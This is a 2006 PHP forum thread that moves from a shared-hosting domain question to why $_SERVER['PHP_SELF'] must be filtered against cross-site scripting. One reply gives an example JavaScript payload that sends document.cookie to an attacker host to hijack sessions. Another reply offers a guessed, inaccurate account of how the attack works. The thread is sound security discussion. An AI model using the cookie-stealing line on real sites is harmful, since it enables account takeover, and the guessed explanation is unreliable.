Page 1 of 1
DNS and IP question
Posted: Wed Apr 05, 2006 8:40 pm
by alex.barylski
I just purchased a new shared host and did so by using some fake domain (something.com or something...) and my hosting company indeed used that name when they created my hosting account...
Now I don't NEED a domain name just the sahred host and I figured I'd simply use the IP.
Obviously my software doesn't use any hardcoded URL and relys solely on
$_SERVER['PHP_SELF'] or whatever that variable is (I can't remember)...
Whenever I type in my IP addy and click on a link and I get redirected to that stupid domain name and my software doesn't exists on that domain...
Can I get the hosting company to somehow disable that redirect?
Do I have to use a hardcoded URL in place of that variable?
Should I just purchase a domain name and use it???
Cheers

Posted: Thu Apr 06, 2006 2:36 am
by R4000
you have 4 options:
(I recommend 2

)
- Hardcode the IP.
Get a new host with a real domain.
Buy the domain.
Or ask your hosting company to give you a subdomain of their domain.
Posted: Thu Apr 06, 2006 2:47 am
by Maugrim_The_Reaper
A domain name maps to an IP (or at least one which will redirect to a shared IP's virtual host). Check you actually have your own dedicated IP for your account. It's not a given and may require a small additional charge.
$_SERVER['PHP_SELF'] - make sure you filter this

Posted: Thu Apr 06, 2006 4:59 am
by timvw
You can get a ton of free (sub) domains... eg: no-ip.info
Posted: Thu Apr 06, 2006 10:10 am
by Bill H
$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
Posted: Thu Apr 06, 2006 10:29 am
by alex.barylski
Bill H wrote:$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...
I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
If I am right, however, I still fail to see why anyone would do such a thing...
It's not like spoofing IP addresses when trying to avoid IP ban scripts or FORM submition when a web site only uses Javascript validation...
So yes, i'm curious too...why and when would you filter that server variable???

Posted: Thu Apr 06, 2006 10:48 am
by timvw
Hockey wrote:Bill H wrote:$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...
I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
Posted: Thu Apr 06, 2006 10:54 am
by alex.barylski
timvw wrote:Hockey wrote:Bill H wrote:
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...
I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
Ahhhhhhh...ok...well thats valid
However, my CMS application is, at current time for a single user only and "every" action requires at least basic authentication - not incredibly secure, but given the circumstances it should be good enough.
Thanks for that heads up though, never even considered that before
Cheers

Posted: Thu Apr 06, 2006 11:03 am
by Bill H
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
Posted: Thu Apr 06, 2006 11:31 am
by alex.barylski
Bill H wrote:The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
I'm no expert in web security, but...
I'm guessing
PHP_SELF is initialized by looking at the script name stored in HTTP headers...
So I imagine that using
SCRIPT_NAME or __FILE__ or something similiar would be better, because their likely initialized on the server, by the server, using environment variables, preventing outside tampering...
Would be my guess anyways...
I'm not totally clear on how XSS works, but i'm pretty sure it works like:
You use a variable like:
PHP_SELF inside FORM elements action attribute.
You don't hardcode the URL but simply do...
Code: Select all
<form action="<?=$_SERVER['PHP_SELF'];?>">
<!-- ...various input elements, etc... -->
</form>
Someone could potentially use your web site now to carry out DoS attacks on another site...
All they would have to do is spoof
PHP_SELF to something like:
http://www.somedomain.com and submit that web site FORM which would send an HTTP GET/POST request to
http://www.somedomain.com instead of the intended website...
http://www.somedomain.com would then have a log of your web site sending abnormal amounts of requests to their web site, mean while you haven't done F' all but still get in trouble...and the script kiddy walks because he spoofs his own IP when calling your troubled script...
This is what I am guessing anyways...
If a script kiddy found enough sites with holes like this they could then possibly carry out DDoS attacks...which is more of a threat...
So I guess comparing
PHP_SELF to
SCRIPT_NAME or hardcoding a URL and just appending
PHP_SELF to it would likely fix that problem...
Of course this is all an educated guess...so if I'm wrong someone jump in and correct me...
I'm curious
p.s-
www.codeproject.com was hacked by a javascript programmer...the message forums allowed javascript and somehow someone figured out how get a script to execute when their message was displayed...so they changed the URL's of the adBanners to some pornographic ad banners instead...whenever someone read their message or entire thread I think it was
Bored or what??? Who thinks of these things

Posted: Thu Apr 06, 2006 1:10 pm
by timvw
I found the comments in
http://shiflett.org/archive/98 quite informative...
Anyway, the easiest exploit i can think of is a simply injection some javascript like this:
Code: Select all
window.location = 'http://evil.example.org/attack.php?cookie=' + document.cookie
Now attack.php knows the session_id and can easily perform actions on behalf of the victim.
feyd | fixed to [syntax] tag
Posted: Thu Apr 06, 2006 2:24 pm
by Bill H
Okay, now I'm going to the head of the "stupid" class, because I still don't have any idea of what is involved in filtering $_SERVER['PHP_SELF'].
Something about comparing it to the the script it's running in... If I can do that, why do I need it at all? I'll just use the script name, right?
I have a form in a script that is going to be used by (included in) several different other scripts, thereby becoming part of the script that included it. Obviously, the <form> tag needs a differing "action" depending on the script that called it. It seems that $_SERVER['PHP_SELF'] is pretty much the obvious choice for that purpose, but you say I then need to "filter" that. Where do I filter it, what is meant by filtering it, and how do I go about doing it?
Posted: Thu Apr 06, 2006 2:27 pm
by feyd
It may be best to split this thread apart, one for PHP_SELF, and the rest stay. Anyone disagree?
Posted: Thu Apr 06, 2006 2:44 pm
by Bill H
Well, that was very polite, considering that I have brutally hijacked the thread about six nautical miles away from the original topic. It was not deliberate. Hmmm. PHP Code perhaps? I'll post it there.